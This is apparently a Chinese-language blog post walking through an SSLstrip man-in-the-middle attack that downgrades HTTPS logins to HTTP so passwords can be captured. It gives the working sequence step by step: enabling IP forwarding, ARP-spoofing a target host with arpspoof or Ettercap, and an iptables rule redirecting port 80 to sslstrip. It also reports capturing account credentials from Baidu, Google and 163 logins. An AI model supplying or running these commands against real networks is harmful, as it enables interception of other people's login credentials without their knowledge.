侧边栏壁纸
博主头像
落叶人生博主等级

走进秋风,寻找秋天的落叶

  • 累计撰写 130562 篇文章
  • 累计创建 28 个标签
  • 累计收到 9 条评论
标签搜索

目 录CONTENT

文章目录

SSLstrip 中间人欺骗Https转Http获取密码

2023-04-23 星期日 / 0 评论 / 0 点赞 / 81 阅读 / 3472 字

***回顾SSLstrip + EtterCap 中间人***实现https转换成http 以获取帐号密码。Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获

.

***回顾

SSLstrip + EtterCap 中间人***实现https转换成http 以获取帐号密码。

Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。

数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward

然后开启Ettercap的iptables 功能

把注析去掉

来个arp欺骗不使用sslstrip 来测试一下https

Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2

Ok

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

NAT 一定的基础

-T 匹配的表 NAT表 :PREROUTING 修改来的包

:OUTPUT 修改路由前本地的包

:POSTROUTING 修改准备发出的包

-A 表示加入高级选项

-P 协议类型

-J 表示把目标80端口的数据包转到其他端口 上诉命令是10000端口

开启ETTERCAP

Ettercap –T –q –I eth0

登录http的百度 效果良好

监听到数据了

登录google

发现在https 卡顿 无法通过

开启sslstrip

再向google登录的时候 https变成http

成功登录

监听到帐号密码

百度的

163的登录

http的跳转

网速过慢……

除了使用arpspoof 还可以使用

Ettercap –T –q –M arp:remote /192.168.1.101/ //

也是arp欺骗 原理一样的。

.

广告 广告

评论区